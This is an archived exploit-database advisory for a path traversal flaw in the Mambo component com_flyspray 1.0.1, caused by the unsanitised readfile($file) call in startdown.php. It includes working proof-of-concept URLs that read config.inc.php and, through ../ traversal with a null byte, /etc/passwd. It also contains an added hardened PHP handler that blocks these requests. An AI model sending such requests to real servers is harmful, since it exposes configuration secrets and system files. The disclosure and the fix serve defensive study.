com_flyspray Mambo Com. <= 1.0.1 - Remote File Disclosure Vulnerability

2006-11-26T00:00:00
ID EDB-ID:2852
Type exploitdb
Reporter 3l3ctric-Cracker
Modified 2006-11-26T00:00:00

Description

com_flyspray Mambo Com. <= 1.0.1 Remote File Disclosure Vulnerability. CVE-2006-6203. Webapps exploit for the PHP platform.

                                        
 _____         __  __             __      ___
|  __ \       |  \/  |            \ \    / (_)
| |  | |_ __  | \  / | __ ___  __  \ \  / / _ _ __ _   _ ___
| |  | | '__| | |\/| |/ _` \ \/ /   \ \/ / | | '__| | | / __|
| |__| | |    | |  | | (_| |>  <     \  /  | | |  | |_| \__ \
|_____/|_|    |_|  |_|\__,_/_/\_\     \/   |_|_|   \__,_|___/


*****************************************************************************************************************************
Component name: com_flyspray
Affected version: 1.0.1
Download page: http://mamboxchange.com/frs/download.php/8304/com_flyspray_1.0.1.zip
*****************************************************************************************************************************
Author: Dr Max Virus
Location: Egypt
*****************************************************************************************************************************
Bug in: startdown.php
Vulnerable code (line 52):
readfile($file);
Problem: the $file variable is passed to readfile() without any sanitization, so a remote user can read any file on the server,
including the configuration file.
*****************************************************************************************************************************
POC:

http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=config.inc.php
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=../../../../../etc/passwd%00
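The unchecked readfile($file) above serves whatever path the request names. A hardened replacement for that handler, added here as an example and not code from the com_flyspray component, canonicalises the requested name and refuses anything outside a fixed attachments directory; the $baseDir path and the safe_attachment_path() helper are assumptions, and the code needs PHP 7.1 or later for the type declarations.

```php
<?php
// Added example, not com_flyspray's code: a hardened replacement for the
// unchecked readfile($file) in startdown.php. Assumes attachments live in a
// single directory ($baseDir, hypothetical path) and that only plain files
// directly inside that directory may be served.

function safe_attachment_path(string $baseDir, string $requested): ?string
{
    // Reject empty names, null bytes and path separators up front. The PoC
    // relies on "../" traversal and a trailing %00 to truncate the path, so
    // neither character may appear in a valid attachment name.
    if ($requested === '' || $requested === '.' || $requested === '..') {
        return null;
    }
    if (strpos($requested, "\0") !== false
        || strpos($requested, '/') !== false
        || strpos($requested, '\\') !== false) {
        return null;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return null; // attachments directory missing or unreadable
    }

    // realpath() resolves symlinks and ".." components, so the canonical
    // result must still sit under $base; anything else escaped the directory.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false
        || strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0
        || !is_file($candidate)) {
        return null;
    }
    return $candidate;
}

// Download handler: every request goes through the check above before
// readfile() touches the filesystem.
$baseDir = '/var/www/html/components/com_flyspray/attachments'; // hypothetical
$requested = isset($_GET['file']) && is_string($_GET['file']) ? $_GET['file'] : '';
$path = safe_attachment_path($baseDir, $requested);
if ($path === null) {
    http_response_code(400);
    exit('Invalid file');
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
```

With this check in place both PoC requests are answered with a 400: the config file lives outside the attachments directory, and the traversal string contains separators and a null byte.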
*****************************************************************************************************************************
Thx To: str0ke & Nukedx & Thehacker & All My Friends
Special Gr33Ts: ASIANEAGLE & The Master & Kacper
****************************************************************************************************************************

# milw0rm.com [2006-11-26]